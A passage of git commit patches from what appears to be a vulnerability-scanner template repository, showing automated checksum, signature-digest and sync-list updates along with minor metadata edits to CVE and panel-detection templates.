a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1469,7 +1469,7 @@ http/cves/2018/CVE-2018-18570.yaml:b798a41cb7e50801d3a488617513cb1b50c6c790 http/cves/2018/CVE-2018-18608.yaml:359014b06168d77454de612d3f99d9897f953262 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 http/cves/2018/CVE-2018-18777.yaml:ea3dae45b965ecb5c04b58193b4d02c42b35f99a -http/cves/2018/CVE-2018-18778.yaml:15d490c3a815cde2d7b41de4bf9293413c37eb6a +http/cves/2018/CVE-2018-18778.yaml:c8d93491aef9542b4f29a8f0912157098e190061 http/cves/2018/CVE-2018-18809.yaml:bacbd73be899c4319544df580c538b31ef7ed112 http/cves/2018/CVE-2018-18925.yaml:8b48587824520a669610a371b4912e8a92e4bca9 http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e @@ -2270,7 +2270,8 @@ http/cves/2021/CVE-2021-37580.yaml:f5dc24043216b36560265de80278583728faf8b2 http/cves/2021/CVE-2021-37589.yaml:d69d7cccc5a283cba577bf63d83b2d1943385f75 http/cves/2021/CVE-2021-37704.yaml:6d7a10739f7c4d531b01d13b3cd734068f58fdfc http/cves/2021/CVE-2021-37833.yaml:e9cbdfefbc2426c4c32a98d8605f766ade0bcee1 -http/cves/2021/CVE-2021-38147.yaml:67956793f1feedef65a6d4f5c208af78ce43e8d3 +http/cves/2021/CVE-2021-38146.yaml:9b89fdc1e651b1034925b9ca0ad97e1725cb82d3 +http/cves/2021/CVE-2021-38147.yaml:190c224c3677c66244ca97bb932036eb64e14394 http/cves/2021/CVE-2021-38314.yaml:e43ac750d1856a2d72b10c003a5f69fcb060db10 http/cves/2021/CVE-2021-38540.yaml:00b59f51b8b6bd546ae1443467b4c6cd318fef28 http/cves/2021/CVE-2021-38647.yaml:d3f362730e7af913985dc415c806983d72f4f665 @@ -8636,7 +8637,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:1e275e8814951a34dea9c484b92832ec958bed6d +templates-checksum.txt:0516b210e73364b2864cb69ded0d521234b27e99 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 67089080cb34db8c615560bbb7981f6b4b3523aa Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 15:45:43 +0000 Subject: [PATCH 0122/1841] Auto Generated New Template Addition List [Tue Jun 11 15:45:43 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index b7c20e8967..8c90940e53 100644 --- a/.new-additions +++ b/.new-additions @@ -3,3 +3,4 @@ http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml +http/exposed-panels/veeam-backup-manager-login.yaml From 9471a6dd99d5de2abf69f43d6490f09a659d84f8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 15:45:48 +0000 Subject: [PATCH 0123/1841] Auto Generated Templates Checksum [Tue Jun 11 15:45:48 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 6094a1770d..afacde7635 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4518,6 +4518,7 @@ http/exposed-panels/v2924-admin-panel.yaml:20b0e24a3e6804139f1be474610304e31c942 http/exposed-panels/vault-panel.yaml:8d56472c645b79321e266d886cfc88badbcbc82b http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688e6c75bbe1b http/exposed-panels/veeam-backup-gcp.yaml:9d051a42faa50df7973f9303bd97f15daada10fa +http/exposed-panels/veeam-backup-manager-login.yaml:2db223aea8f4276496fc38c674084f42bdf11e96 http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 http/exposed-panels/veriz0wn-osint.yaml:cbe524b980c87bf0780cee3aff662797153c985c http/exposed-panels/verizon-router-panel.yaml:cbdcbd2023415c5f2dc6fbb45cf9e9c226a9011b @@ -8637,7 +8638,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:0516b210e73364b2864cb69ded0d521234b27e99 +templates-checksum.txt:9317fce206ac2a303a5ff488b75d571db187f0be wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f66a174d9f450a80bdea6e411862a42e87c432bb Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 15:46:16 +0000 Subject: [PATCH 0124/1841] Auto Template Signing [Tue Jun 11 15:46:16 UTC 2024] :robot: --- http/cves/2018/CVE-2018-18778.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2018/CVE-2018-18778.yaml b/http/cves/2018/CVE-2018-18778.yaml index 9a7d93f525..4a7b985fa2 100644 --- a/http/cves/2018/CVE-2018-18778.yaml +++ b/http/cves/2018/CVE-2018-18778.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e849e594ed1648ce02d93bdd84f710d963ce4f68659ff9fe8fa70068bec9b6d702210091ba093250cf441932d859694d5fd95315c5a0df7f0c68f213c9cc8bfe55b9e2:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100d5e8be66b2b1085f97e516f2ba33d738ffe158c9a3e81ed8fdcf861bf099274a022100a6523a54d37797bbfa2e1810af470add193798ad1aa0be028fe4d7e1040b1502:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From d30966ffaa1e7f38b2ba99d0c18f175f85335104 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 15:46:29 +0000 Subject: [PATCH 0125/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index e8aebdd613..7bae1dfe4a 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -8,6 +8,7 @@ on: - 'http/cves/2023/CVE-2023-38194.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' + - 'http/exposed-panels/veeam-backup-manager-login.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 3d7d83c0a7ea6b803296e4bb538c2a002e793582 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jun 2024 21:27:19 +0530 Subject: [PATCH 0126/1841] minor update --- http/cves/2023/CVE-2023-43472.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-43472.yaml b/http/cves/2023/CVE-2023-43472.yaml index 30fecfd16e..68eeab74b9 100644 --- a/http/cves/2023/CVE-2023-43472.yaml +++ b/http/cves/2023/CVE-2023-43472.yaml @@ -18,9 +18,10 @@ info: cvss-score: 7.5 cve-id: CVE-2023-43472 epss-score: 0.00116 - epss-percentile: 0.44809 + epss-percentile: 0.45309 cpe: cpe:2.3:a:lfprojects:mlflow:*:*:*:*:*:*:*:* metadata: + verified: true vendor: lfprojects product: mlflow shodan-query: http.title:"mlflow" From 0cebfad1891a277018bf5d292431c9fd69feaa69 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 15:59:23 +0000 Subject: [PATCH 0127/1841] Auto Generated New Template Addition List [Tue Jun 11 15:59:23 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 8c90940e53..055e816229 100644 --- a/.new-additions +++ b/.new-additions @@ -4,3 +4,4 @@ http/cves/2023/CVE-2023-38194.yaml http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml +http/technologies/nperf-server-detect.yaml From 7a40a6646c1b963ec47f35cbcc68cd46e38e0003 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 15:59:27 +0000 Subject: [PATCH 0128/1841] Auto Generated Templates Checksum [Tue Jun 11 15:59:27 UTC 2024] :robot: --- templates-checksum.txt | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index afacde7635..577a83458b 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -1469,7 +1469,7 @@ http/cves/2018/CVE-2018-18570.yaml:b798a41cb7e50801d3a488617513cb1b50c6c790 http/cves/2018/CVE-2018-18608.yaml:359014b06168d77454de612d3f99d9897f953262 http/cves/2018/CVE-2018-18775.yaml:6855fbb7653fb75ebfb58a92e13a94bddd6363e7 http/cves/2018/CVE-2018-18777.yaml:ea3dae45b965ecb5c04b58193b4d02c42b35f99a -http/cves/2018/CVE-2018-18778.yaml:c8d93491aef9542b4f29a8f0912157098e190061 +http/cves/2018/CVE-2018-18778.yaml:6319e5524e95760044c48666c46093da1c88b0e8 http/cves/2018/CVE-2018-18809.yaml:bacbd73be899c4319544df580c538b31ef7ed112 http/cves/2018/CVE-2018-18925.yaml:8b48587824520a669610a371b4912e8a92e4bca9 http/cves/2018/CVE-2018-19136.yaml:2cdceec8a347290659292d34e7f91f97f8e8671e @@ -6804,7 +6804,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:e356f0d48520e09aceb1bda90f54a41e8a5492fa +http/technologies/favicon-detect.yaml:40da6d814e25db70330b3b13332e9432da6ae025 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -6945,6 +6945,7 @@ http/technologies/nimplant-c2.yaml:a418c05f3435385c6d0ad98887178470aa3b83ce http/technologies/nimsoft-wasp.yaml:0104e66c3b81834e61ff1415755bb68e5c3a3894 http/technologies/node-red-detect.yaml:21f89c4fd30bff88d28d7f1e4aef668d1eae2125 http/technologies/notion-detect.yaml:81353cfc03afa7497737ccccd9e4b0e0dcc37217 +http/technologies/nperf-server-detect.yaml:8aff13bb33a941f34302d57359fb4fa9e1d6e9b3 http/technologies/ntop-detect.yaml:193ff6bd6090ada2481b602284d931e965a15b01 http/technologies/oauth2-detect.yaml:d7b5c8d2ef83d41f2aa79eabd203dac0d6867154 http/technologies/octobercms-detect.yaml:1e5446e2828b4c830b14ce18f4ad04fdb0f8e3ee @@ -8638,7 +8639,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:9317fce206ac2a303a5ff488b75d571db187f0be +templates-checksum.txt:17fb713723635d6bf749425b4f789e829605c3f0 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From f22a696c0071b86796952d4331b1cff2cb6f6cea Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:00:09 +0000 Subject: [PATCH 0129/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 7bae1dfe4a..4c70a1a167 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -9,6 +9,7 @@ on: - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' + - 'http/technologies/nperf-server-detect.yaml' workflow_dispatch: jobs: triggerRemoteWorkflow: From 91f160cba7e3c01b2341cc6b00665e280dfa6e26 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:01:17 +0000 Subject: [PATCH 0130/1841] Auto Template Signing [Tue Jun 11 16:01:17 UTC 2024] :robot: --- http/exposed-panels/veeam-backup-manager-login.yaml | 1 + http/technologies/favicon-detect.yaml | 2 +- http/technologies/nperf-server-detect.yaml | 1 + 3 files changed, 3 insertions(+), 1 deletion(-) diff --git a/http/exposed-panels/veeam-backup-manager-login.yaml b/http/exposed-panels/veeam-backup-manager-login.yaml index 9cd6fce998..5b5a9a61f9 100644 --- a/http/exposed-panels/veeam-backup-manager-login.yaml +++ b/http/exposed-panels/veeam-backup-manager-login.yaml @@ -30,3 +30,4 @@ http: - type: status status: - 200 +# digest: 4a0a00473045022100e800bce8f560e78373987dc22a9d1dde7b46a7e03bafb1cb39624dd567bc58e202207fdce4b8c9b3ab85e92f3a2464c81c30a5305cb4605f4f3ade5cc3f8acd1f12c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/favicon-detect.yaml b/http/technologies/favicon-detect.yaml index 0dd50e3e40..8c4c01914c 100644 --- a/http/technologies/favicon-detect.yaml +++ b/http/technologies/favicon-detect.yaml @@ -3770,4 +3770,4 @@ http: - type: dsl dsl: - 'mmh3(base64_py(body))' -# digest: 490a0046304402205cb34f4133d517497e2ca84e04155f515599832c8140013750504b829e85835002202b05a3eeffc3f285d36aef7cd972b21d83b9307082208fb8b054639b86826a54:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100c58de167fd57418bef3c06144b8c31ac6643bc3fd4be254b92d150469cf3b8b9022035f7c5eef3dafa91dbedac40679286c24fb12239c15058df9406552bd078d7b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/nperf-server-detect.yaml b/http/technologies/nperf-server-detect.yaml index 10315c5df7..790100a0f5 100644 --- a/http/technologies/nperf-server-detect.yaml +++ b/http/technologies/nperf-server-detect.yaml @@ -38,3 +38,4 @@ http: part: header kval: - Server +# digest: 4b0a00483046022100ccbad15cb4d3301d5b712a4924751962f54e85503c7c8c5e079357a12b6c6ffe0221009652f2bf66671ab7987298df25bacd7fcd19a255800af8981075bb0059968063:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 0a69f50acb726c147415401c07b69b7891dfd614 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jun 2024 21:32:39 +0530 Subject: [PATCH 0131/1841] minor update --- http/cves/2023/CVE-2023-6505.yaml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml index 7ab4bd7553..fe60240652 100644 --- a/http/cves/2023/CVE-2023-6505.yaml +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -2,7 +2,7 @@ id: CVE-2023-6505 info: name: Prime Mover < 1.9.3 - Sensitive Data Exposure - author: securityforeveryone.com + author: securityforeveryone severity: high description: | Prime Mover plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.9.2 via directory listing in the 'prime-mover-export-files/1/' folder. This makes it possible for unauthenticated attackers to extract sensitive data including site and configuration information, directories, files, and password hashes. @@ -11,7 +11,6 @@ info: reference: - https://wpscan.com/vulnerability/eca6f099-6af0-4f42-aade-ab61dd792629 - https://research.cleantalk.org/cve-2023-6505-prime-mover-poc-exploit/ - - https://github.com/fkie-cad/nvd-json-data-feeds - https://nvd.nist.gov/vuln/detail/CVE-2023-6505 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N From 2e15de70532a20243bea921f627beea0403e49c2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jun 2024 21:35:24 +0530 Subject: [PATCH 0132/1841] Update and rename wildix-collaboration-panel.yaml to exposed-panelswildix-collaboration-panel.yaml --- .../exposed-panelswildix-collaboration-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/{technologies/wildix-collaboration-panel.yaml => exposed-panels/exposed-panelswildix-collaboration-panel.yaml} (100%) diff --git a/http/technologies/wildix-collaboration-panel.yaml b/http/exposed-panels/exposed-panelswildix-collaboration-panel.yaml similarity index 100% rename from http/technologies/wildix-collaboration-panel.yaml rename to http/exposed-panels/exposed-panelswildix-collaboration-panel.yaml From a5b3df48de0a739e286e845d52356f17a75b4b0b Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jun 2024 21:35:50 +0530 Subject: [PATCH 0133/1841] minor update --- ...x-collaboration-panel.yaml => wildix-collaboration-panel.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename http/exposed-panels/{exposed-panelswildix-collaboration-panel.yaml => wildix-collaboration-panel.yaml} (100%) diff --git a/http/exposed-panels/exposed-panelswildix-collaboration-panel.yaml b/http/exposed-panels/wildix-collaboration-panel.yaml similarity index 100% rename from http/exposed-panels/exposed-panelswildix-collaboration-panel.yaml rename to http/exposed-panels/wildix-collaboration-panel.yaml From 57aa56a2f28d4ed1b234a88c425d3bdabee0dbb2 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:07:56 +0000 Subject: [PATCH 0134/1841] Auto Generated New Template Addition List [Tue Jun 11 16:07:56 UTC 2024] :robot: --- .new-additions | 1 + 1 file changed, 1 insertion(+) diff --git a/.new-additions b/.new-additions index 055e816229..5f9a2adb45 100644 --- a/.new-additions +++ b/.new-additions @@ -1,6 +1,7 @@ http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml +http/cves/2023/CVE-2023-6505.yaml http/cves/2024/CVE-2024-23692.yaml http/exposed-panels/oracle-application-server-panel.yaml http/exposed-panels/veeam-backup-manager-login.yaml From d9d3669393d0afdde094ddd34f263bd65628123d Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:08:04 +0000 Subject: [PATCH 0135/1841] Auto Generated Templates Checksum [Tue Jun 11 16:08:04 UTC 2024] :robot: --- templates-checksum.txt | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 577a83458b..49a1726f93 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3237,6 +3237,7 @@ http/cves/2023/CVE-2023-6360.yaml:4dc28d57d894063fd6a67edf0e29ea2380fad9be http/cves/2023/CVE-2023-6379.yaml:9f2ebeef8f2c8d3a3fb9c0e8b49cc3c0c132082d http/cves/2023/CVE-2023-6380.yaml:f4d215b24e29caa45bee7186a98523bad5c7e231 http/cves/2023/CVE-2023-6389.yaml:1442104ed12f70cbab2bdea5effa6e4262a9b95f +http/cves/2023/CVE-2023-6505.yaml:40a19a9eb6153b83a8dc2e64b05c57219055d413 http/cves/2023/CVE-2023-6553.yaml:7a54271ce0dabed297718787b829f3ddc52b256c http/cves/2023/CVE-2023-6567.yaml:36ddd59d4deab3cab1f59f9bcd8a5e8ddb07d6c0 http/cves/2023/CVE-2023-6623.yaml:00d70a24f04c9124d433cb202bbe6d5feac8db68 @@ -4518,7 +4519,7 @@ http/exposed-panels/v2924-admin-panel.yaml:20b0e24a3e6804139f1be474610304e31c942 http/exposed-panels/vault-panel.yaml:8d56472c645b79321e266d886cfc88badbcbc82b http/exposed-panels/veeam-backup-azure-panel.yaml:986e549ba8272b1fb4f420b0d61688e6c75bbe1b http/exposed-panels/veeam-backup-gcp.yaml:9d051a42faa50df7973f9303bd97f15daada10fa -http/exposed-panels/veeam-backup-manager-login.yaml:2db223aea8f4276496fc38c674084f42bdf11e96 +http/exposed-panels/veeam-backup-manager-login.yaml:61c42ca2d709d88a6a251af450c32a104f31e4d0 http/exposed-panels/veeam-panel.yaml:ef98410c87107e18e3d656564a62ff6b7c3b0641 http/exposed-panels/veriz0wn-osint.yaml:cbe524b980c87bf0780cee3aff662797153c985c http/exposed-panels/verizon-router-panel.yaml:cbdcbd2023415c5f2dc6fbb45cf9e9c226a9011b @@ -6804,7 +6805,7 @@ http/technologies/eyesofnetwork-detect.yaml:e0c0110691a6139133735cd2a4a8b709e872 http/technologies/fanruanoa-detect.yaml:e7b2e01057d3be79d3ddbcc64b33f9af7a33bbb1 http/technologies/fanruanoa2012-detect.yaml:f9a6f78d0d2e34d49a10f73f592bd87169259bac http/technologies/fastjson-version.yaml:50f165d16a31d441a597695102e983ebbaa1857a -http/technologies/favicon-detect.yaml:40da6d814e25db70330b3b13332e9432da6ae025 +http/technologies/favicon-detect.yaml:739faaa25559bf603552760b2a4a1c98e8b3bfb9 http/technologies/fingerprinthub-web-fingerprints.yaml:4dbe54eb11797d8ee2acfbafbf269363102734bd http/technologies/froxlor-detect.yaml:67aaf702a20981d17394938929f1835d6b48e6b2 http/technologies/gabia-server-detect.yaml:194d560530bd2f19ab14523319f46dd7ef3757d8 @@ -6945,7 +6946,7 @@ http/technologies/nimplant-c2.yaml:a418c05f3435385c6d0ad98887178470aa3b83ce http/technologies/nimsoft-wasp.yaml:0104e66c3b81834e61ff1415755bb68e5c3a3894 http/technologies/node-red-detect.yaml:21f89c4fd30bff88d28d7f1e4aef668d1eae2125 http/technologies/notion-detect.yaml:81353cfc03afa7497737ccccd9e4b0e0dcc37217 -http/technologies/nperf-server-detect.yaml:8aff13bb33a941f34302d57359fb4fa9e1d6e9b3 +http/technologies/nperf-server-detect.yaml:f7fb783053b9454eb9f9275c0fec77a27f89f929 http/technologies/ntop-detect.yaml:193ff6bd6090ada2481b602284d931e965a15b01 http/technologies/oauth2-detect.yaml:d7b5c8d2ef83d41f2aa79eabd203dac0d6867154 http/technologies/octobercms-detect.yaml:1e5446e2828b4c830b14ce18f4ad04fdb0f8e3ee @@ -8639,7 +8640,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:17fb713723635d6bf749425b4f789e829605c3f0 +templates-checksum.txt:8d54e9fe5b3c479c04098f084d9ce90a0e5e3b7f wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 7d08bf20e8d0fe0c233bf306cbbd5f6509a5b845 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:08:52 +0000 Subject: [PATCH 0136/1841] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 4c70a1a167..39e51b2f9f 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -6,6 +6,7 @@ on: - 'http/cves/2021/CVE-2021-38146.yaml' - 'http/cves/2021/CVE-2021-38147.yaml' - 'http/cves/2023/CVE-2023-38194.yaml' + - 'http/cves/2023/CVE-2023-6505.yaml' - 'http/cves/2024/CVE-2024-23692.yaml' - 'http/exposed-panels/oracle-application-server-panel.yaml' - 'http/exposed-panels/veeam-backup-manager-login.yaml' From 02c515164e39c74d974564b85e0ac70c804803d4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:09:15 +0000 Subject: [PATCH 0137/1841] Auto Generated Templates Checksum [Tue Jun 11 16:09:15 UTC 2024] :robot: --- templates-checksum.txt | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 49a1726f93..943822a4f7 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -4576,6 +4576,7 @@ http/exposed-panels/webtransfer-client-panel.yaml:b1054dd275106994578f41a42c2f5e http/exposed-panels/webuzo-admin-panel.yaml:79771243fa08571a0cef9c0102bc4891b3d61f77 http/exposed-panels/weiphp-panel.yaml:3e5f27cdb4868c216dfa5f7a321e68777cc710a9 http/exposed-panels/whm-login-detect.yaml:2023f5c1f8aa4ddfc9aff536684167141ae4fa4e +http/exposed-panels/wildix-collaboration-panel.yaml:0047480205d033d0c35b7e1714b4315febe157c2 http/exposed-panels/wiren-board-webui.yaml:3d3ad4063b875c1ad154d84ff5bfce3b490cbd40 http/exposed-panels/wmw-enterprise-panel.yaml:4e63e7afc9132ea9ed6204b751bb56c5df4a9f0c http/exposed-panels/woodwing-panel.yaml:d942acdcb220526e73ff3c3ec78289807bd0e1f1 @@ -8640,7 +8641,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:8d54e9fe5b3c479c04098f084d9ce90a0e5e3b7f +templates-checksum.txt:0a332e6ab0843d5471dcf38c2e95f30cdc0b34aa wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From bcbb7f9dbe0f440f15182fe5791eb2a593ef77ba Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Tue, 11 Jun 2024 16:09:45 +0000 Subject: [PATCH 0138/1841] Auto Template Signing [Tue Jun 11 16:09:45 UTC 2024] :robot: --- http/cves/2023/CVE-2023-6505.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-6505.yaml b/http/cves/2023/CVE-2023-6505.yaml index fe60240652..a1c805a7f7 100644 --- a/http/cves/2023/CVE-2023-6505.yaml +++ b/http/cves/2023/CVE-2023-6505.yaml @@ -44,3 +44,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402207b6087f316e997f175717b9bd29d8ef685a57d7930faa01acb39f718680cf90602206209359c32816243472ccbfddf7852055d08dcb3295b5262fcd4fdab01f59fe9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From 4364aa5bddeffa2b3fd2b4b0bef92a6e9e7de7b9 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Tue, 11 Jun 2024 21:39:53 +0530 Subject: [PATCH 0139/1841] minor update --- http/cves/2023/CVE-2023-6786.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/http/cves/2023/CVE-2023-6786.yaml b/http/cves/2023/CVE-2023-6786.yaml index cd16ae440f..9f3a4d9764 100644 --- a/http/cves/2023/CVE-2023-6786.yaml +++ b/http/cves/2023/CVE-2023-6786.yaml @@ -2,7 +2,7 @@ id: CVE-2023-6786 info: name: Payment Gateway for Telcell < 2.0.4 - Open Redirect - author: securityforeveryone.com + author: securityforeveryone severity: medium description: | The plugin does not validate the api_url parameter before redirecting the user to its value, leading to an Open Redirect issue From 940f49f9eab8526914b9fe1c3bbc3267965eaef6 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Tue, 11 Jun 2024 16:11:47 +0000 Subject: [PATCH 0140/1841] Auto Generated New Template Addition List [Tue Jun 11 16:11:47 UTC 2024] :robot: --- .new-additions | 2 ++ 1 file changed, 2 insertions(+) diff --git a/.new-additions b/.new-additions index 5f9a2adb45..b662f9c16d 100644 --- a/.new-additions +++ b/.new-additions @@ -2,7 +2,9 @@ http/cves/2021/CVE-2021-38146.yaml http/cves/2021/CVE-2021-38147.yaml http/cves/2023/CVE-2023-38194.yaml http/cves/2023/CVE-2023-6505.yaml +http/cves/2023/CVE-2023-6786.yaml 